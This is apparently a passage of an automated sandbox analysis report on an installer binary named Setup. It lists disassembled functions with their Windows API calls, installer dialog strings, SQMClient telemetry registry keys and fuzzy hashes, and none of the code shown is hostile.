                                                                                                • Part of subcall function 63958ECA: GetDlgItem.USER32(?,0000004E), ref: 63958F73
                                                                                                • Part of subcall function 63958ECA: GetDlgItem.USER32(?,?), ref: 63958F88
                                                                                                • Part of subcall function 63958CD7: __EH_prolog3.LIBCMT ref: 63958CDE
                                                                                                • Part of subcall function 6395F42A: __EH_prolog3.LIBCMT ref: 6395F431
                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,00000065,00000067), ref: 6395929E
                                                                                              • ShowWindow.USER32(205ABF9D,00000000,?,?,?,?,?,?,00000065,00000067), ref: 639592B0
                                                                                              • ShowWindow.USER32(?,00000000,?,00000066,00000068,?,?,?,?,?,?,?,?,?,?,?), ref: 63959335
                                                                                              • ShowWindow.USER32(00000012,00000000,?,00000066,00000068,?,?,?,?,?,?,?,?,?,?,?), ref: 63959347
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Path$DriveNumber$ShowWindow$H_prolog3_Item$DirectorySystemTemp_memset_wmemcpy_s
                                                                                              • String ID: Action$Download Drive$Product Drive$System Drive
                                                                                              • API String ID: 1601511689-2973646315
                                                                                              • Opcode ID: 94a16aa9fc3e2edc6a4a8186c34838e13c8a31f014b4bf0e7f2ce99582e14ac5
                                                                                              • Instruction ID: df6dcb910fcbef326b7af7198fca7aa65fa6bad51b82636109f3b20f091f7fdd
                                                                                              • Opcode Fuzzy Hash: 94a16aa9fc3e2edc6a4a8186c34838e13c8a31f014b4bf0e7f2ce99582e14ac5
                                                                                              • Instruction Fuzzy Hash: ABC13D715083409FD710DB78C884B5EB7E8BF9AB28F044A59F999DB291CB31D854CFA2
                                                                                              Function 639521B8 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 199COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639521BF
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6394D170: __EH_prolog3.LIBCMT ref: 6394D177
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63952425
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                              • String ID: Bitmap$Font$Icon$Text$UIInfo.xml$UiInfo element 'Static' should have one of Text, Icon or Bitmap elements!
                                                                                              • API String ID: 1412866469-225342085
                                                                                              • Opcode ID: 1e96237d2734658763666903c3429873475370084523d528902388a8d0670ad7
                                                                                              • Instruction ID: c1cee15ee1cd0576be8b8a13c62418eb310c757d08d1d3ca0f683849bbac45df
                                                                                              • Opcode Fuzzy Hash: 1e96237d2734658763666903c3429873475370084523d528902388a8d0670ad7
                                                                                              • Instruction Fuzzy Hash: 1C817C7190124CEFDB00DBA8C944BDEB7B8AF1A728F284195F454AB382D734EA44DF61
                                                                                              Function 639593BE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639593C5
                                                                                                • Part of subcall function 6395795B: __EH_prolog3.LIBCMT ref: 63957962
                                                                                                • Part of subcall function 6395795B: EnumWindows.USER32(63957C3F,?), ref: 639579BF
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000000), ref: 639594F0
                                                                                                • Part of subcall function 6395F42A: __EH_prolog3.LIBCMT ref: 6395F431
                                                                                              • SendDlgItemMessageW.USER32(00000001,0000006F,00000172,00000001,?), ref: 63959509
                                                                                              • SetWindowTextW.USER32(?,?), ref: 63959518
                                                                                              • EnableWindow.USER32(?,00000001), ref: 6395952C
                                                                                              • EnableWindow.USER32(?,00000000), ref: 6395953D
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395954A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$H_prolog3$Enable$EnumExceptionItemMessageRaiseSendShowTextWindows
                                                                                              • String ID: %s
                                                                                              • API String ID: 3119945384-3043279178
                                                                                              • Opcode ID: ba319aef2e3f6f5d68e7269112b93f3845f104569c9dcff2d3c828e2d2fb7eea
                                                                                              • Instruction ID: b62bca1629acf7de44f4617a341f53711df61fe4a1a9d65482bf741671dbe580
                                                                                              • Opcode Fuzzy Hash: ba319aef2e3f6f5d68e7269112b93f3845f104569c9dcff2d3c828e2d2fb7eea
                                                                                              • Instruction Fuzzy Hash: E351A571904215EFEB11DFA8C884BCDBFB0BF0AB15F144194F518AB282C73099A1CFA1
                                                                                              Function 6396A311 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStartupInfoW.KERNEL32(639414A0,639691D6), ref: 6396A31E
                                                                                              • __calloc_crt.LIBCMT ref: 6396A32A
                                                                                                • Part of subcall function 63969F70: Sleep.KERNEL32(00000000,?,639691D6,?), ref: 63969F98
                                                                                              • __calloc_crt.LIBCMT ref: 6396A3CA
                                                                                              • GetFileType.KERNEL32(74C08559,00000001,639691D6), ref: 6396A451
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                              • String ID:
                                                                                              • API String ID: 591920814-0
                                                                                              • Opcode ID: fc26f06a4553488e529a20956889285f810d46bd5cae1b22399113ab02a36a66
                                                                                              • Instruction ID: 8cd0dae9dcdfd09c3f7dc6bb5a0b3db3b3e68526f865a637707322f713fd2109
                                                                                              • Opcode Fuzzy Hash: fc26f06a4553488e529a20956889285f810d46bd5cae1b22399113ab02a36a66
                                                                                              • Instruction Fuzzy Hash: 6E61E2B150A7618FE700DF68CC88B1A77B8AF97B64F194668E566CB2D1E730D801CF01
                                                                                              Function 6C5DBA44 Relevance: 13.6, APIs: 9, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C5DBAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000040,00000000,00000000,6C5DBA57,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAFB
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBA86
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBA9D
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAB4
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2739
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E276E
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E27F4
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2801
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2812
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateEventHandle$ErrorLast$CountCriticalInitializeSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 2704725777-0
                                                                                              • Opcode ID: 511333379bc02d96a25da82389223d74247e50f1d948e43e70ea33d7eb5bf9fb
                                                                                              • Instruction ID: 7b3b4d39c3db09a8899a0efde4ce919e2e305072a4fc7474b4b286ad4bf73390
                                                                                              • Opcode Fuzzy Hash: 511333379bc02d96a25da82389223d74247e50f1d948e43e70ea33d7eb5bf9fb
                                                                                              • Instruction Fuzzy Hash: D2519B74901304EFDB50EF6ACC84EAAB7F9FF44348B2A08AAE111D6E51C370E9848B54
                                                                                              Function 6C5D5E53 Relevance: 12.6, APIs: 10, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID:
                                                                                              • API String ID: 2221118986-0
                                                                                              • Opcode ID: 7e0159214f05f092813d7215edd18f8e7927451cd52de21e904934e0ab6ae338
                                                                                              • Instruction ID: 8e8a1a1e86c38b0f8ebeb97397ae4017dd0061ee6d98e24f65b54ecd3e6e48da
                                                                                              • Opcode Fuzzy Hash: 7e0159214f05f092813d7215edd18f8e7927451cd52de21e904934e0ab6ae338
                                                                                              • Instruction Fuzzy Hash: 59410BB1541B049FD370CF6AC885A83FBE8FF98704F41892EE2AA97650DB71B509CB54
                                                                                              Function 6C5E7AAB Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,000F003F,?,Software\Microsoft\SQMClient\Windows,80000002,CabSessionAfterSize), ref: 6C5E7AE6
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 6C5E7C4C
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C5E7B3D
                                                                                                • Part of subcall function 6C5E77B8: EtwTraceMessage.NTDLL ref: 6C5E781A
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • RegDeleteValueW.ADVAPI32(00000057,00000000,00000000,00000000,00000026,6C5E5AB8), ref: 6C5E7D12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$DeleteEnumInfoMessageOpenQueryTracemalloc
                                                                                              • String ID: CabSessionAfterSize$Software\Microsoft\SQMClient\Windows$W
                                                                                              • API String ID: 3944082161-4242814227
                                                                                              • Opcode ID: 3ee66e22c38b581225e36f058039524026cf1ddd96404d598a7276cb73f71f0e
                                                                                              • Instruction ID: 085a53cdda4d599d081153b8184a382e184bfe899f63c764ddab563702e8c9f9
                                                                                              • Opcode Fuzzy Hash: 3ee66e22c38b581225e36f058039524026cf1ddd96404d598a7276cb73f71f0e
                                                                                              • Instruction Fuzzy Hash: 0381A071501244EFDB199F55CD84EAE7BFAFF48388F618469F924AA9A2C331C944CF00
                                                                                              Function 6395D86C Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 63960324: SendMessageW.USER32(?,00000437,00000000,?), ref: 63960344
                                                                                              • _memset.LIBCMT ref: 6395D8B6
                                                                                              • SendMessageW.USER32(?,0000043A,00000001,?), ref: 6395D8D9
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395D81A: __EH_prolog3.LIBCMT ref: 6395D821
                                                                                                • Part of subcall function 63960353: GetWindowTextLengthW.USER32(?), ref: 6396035B
                                                                                                • Part of subcall function 63960353: SendMessageW.USER32(?,000000C2,?,00000000), ref: 63960377
                                                                                                • Part of subcall function 63950D3D: _memset.LIBCMT ref: 63950D6A
                                                                                                • Part of subcall function 63950D3D: SendMessageW.USER32(?,00000444,00000001,?), ref: 63950D93
                                                                                                • Part of subcall function 63950E35: _memset.LIBCMT ref: 63950E62
                                                                                                • Part of subcall function 63950E35: SendMessageW.USER32(?,00000444,00000001,00000074), ref: 63950E92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memset$H_prolog3$LengthTextWindow
                                                                                              • String ID: $IDS_INSTALLATION_BLOCKERS$IDS_PRE_INSTALLATION_WARNINGS$IDS_SUCCESS_BLOCKERS_LIST_HEADER$t
                                                                                              • API String ID: 808874516-693864943
                                                                                              • Opcode ID: e88a760b074c615f5c7c36e554ccc897d13bd7a090484be2c3e63615af512aaf
                                                                                              • Instruction ID: 3738e6f72b3c9db7a5ef31b254d3bc5da869e28ad0fd7936b2281ec6fa54018f
                                                                                              • Opcode Fuzzy Hash: e88a760b074c615f5c7c36e554ccc897d13bd7a090484be2c3e63615af512aaf
                                                                                              • Instruction Fuzzy Hash: B5718E72940614ABDB20DB68CC45FCE7778AF96B28F214184F618BB2D1DB70EA95CF50
                                                                                              Function 6C5DE442 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 186timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DE49A
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,Function_00007AF4), ref: 6C5E05DD
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,Function_00007AF4), ref: 6C5E05F1
                                                                                                • Part of subcall function 6C5DE552: RegOpenKeyExW.ADVAPI32(?,80000001,00000000,-00020005,?,00000000,?,?,?,?,6C5DE526,80000001,?,?), ref: 6C5DE5A8
                                                                                              Strings
                                                                                              • Software\Microsoft\SQMClient\Windows\DisabledSessions, xrefs: 6C5E0668
                                                                                              • %s\%s\%s, xrefs: 6C5DE4C5
                                                                                              • Software\Microsoft\SQMClient, xrefs: 6C5DE4C0
                                                                                              • Sampling, xrefs: 6C5DE4BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$FileOpen_vsnwprintfmemset
                                                                                              • String ID: %s\%s\%s$Sampling$Software\Microsoft\SQMClient$Software\Microsoft\SQMClient\Windows\DisabledSessions
                                                                                              • API String ID: 3792293845-3320126751
                                                                                              • Opcode ID: b2251ccdedbe7ef7e3a5d99875c7095a76eefdca1a6f419af01072ab0c614556
                                                                                              • Instruction ID: 8a48a4c3c7ef0c410a02325456518afeb90be19c64b2441f4cd28cb540393b6c
                                                                                              • Opcode Fuzzy Hash: b2251ccdedbe7ef7e3a5d99875c7095a76eefdca1a6f419af01072ab0c614556
                                                                                              • Instruction Fuzzy Hash: 01610331500348ABDF058E58DC84FEEB7B8EB89358F2104DAE524A6952D771EE89CF58
                                                                                              Function 63954B2A Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 182COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63954B31
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395434E: __EH_prolog3.LIBCMT ref: 63954355
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: DiskSpaceInfo$ProcessListBox$ProcessStatusIcon$RefreshButton$ServiceListBox$ServiceStatusIcon
                                                                                              • API String ID: 431132790-2340012964
                                                                                              • Opcode ID: 31325e66cf687b08ef806661e58bc35f2ea7d64c0ea408c8fb9908ced208104e
                                                                                              • Instruction ID: 2ffb15810f5a15d084048a4726b57acef62726460342c2e3dbdeeaa0fcb2e35f
                                                                                              • Opcode Fuzzy Hash: 31325e66cf687b08ef806661e58bc35f2ea7d64c0ea408c8fb9908ced208104e
                                                                                              • Instruction Fuzzy Hash: 7D715F7190424CEFDB00DBE8C944BDEB7E8AF29728F188199F558E7281D734DA499F21
                                                                                              Function 63953AD4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6395381C: __EH_prolog3.LIBCMT ref: 63953823
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: File$Hide$Static$SubTitle$SysLink$Title
                                                                                              • API String ID: 431132790-4216723965
                                                                                              • Opcode ID: 9ef7dc48868f55bbc119c679f4b0ea76c6f60d77e41ff0579629b5334208c155
                                                                                              • Instruction ID: fcc71bb91b72c992a66c42bef48781fa51f580886ccd9ca071082246b0ebafbd
                                                                                              • Opcode Fuzzy Hash: 9ef7dc48868f55bbc119c679f4b0ea76c6f60d77e41ff0579629b5334208c155
                                                                                              • Instruction Fuzzy Hash: 0461397190024DEFDF00DBA8C944BDEB7B8AF19728F188198F414EB282C775EA44DB61
                                                                                              Function 6C5D2885 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C5D28C4
                                                                                              • memset.MSVCRT ref: 6C5D3C7D
                                                                                              • OpenMutexW.KERNEL32(00100000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6C5D3CB1
                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6C5D3CC0
                                                                                              • GetLastError.KERNEL32 ref: 6C5E3E29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Mutex$CountCreateCriticalErrorInitializeLastOpenSectionSpinmemset
                                                                                              • String ID: Local\SqmLock_%s
                                                                                              • API String ID: 435864437-4290917916
                                                                                              • Opcode ID: c725941a7353ef35e200d20b35b6b62d54623984ee613ff2564e3dcf794153b7
                                                                                              • Instruction ID: 2c1c65e6b70f949ffc4268167ecf1b7a24eec7466b42e5cc0b33bcb0b1af789d
                                                                                              • Opcode Fuzzy Hash: c725941a7353ef35e200d20b35b6b62d54623984ee613ff2564e3dcf794153b7
                                                                                              • Instruction Fuzzy Hash: EE41E030A00304EFCB508F598D88F9A7AF9BB49348F5604A9E595E7A61C770DCC88F58
                                                                                              Function 6C5D443B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(SensApi.dll,00000000,?), ref: 6C5D4452
                                                                                              • GetProcAddress.KERNEL32(00000000,IsNetworkAlive), ref: 6C5D4468
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6C5D447F
                                                                                              • GetLastError.KERNEL32 ref: 6C5DF8D5
                                                                                              • GetLastError.KERNEL32 ref: 6C5DF912
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                              • String ID: IsNetworkAlive$SensApi.dll
                                                                                              • API String ID: 1529210728-555838347
                                                                                              • Opcode ID: 876b4cd0803108691802b36d900625dedc8dda483025abb4d6da22b8180a7076
                                                                                              • Instruction ID: e1e710d969dcaf9b427f0ccec936f1143356f45335bbaa0494c2f15fc5ec537a
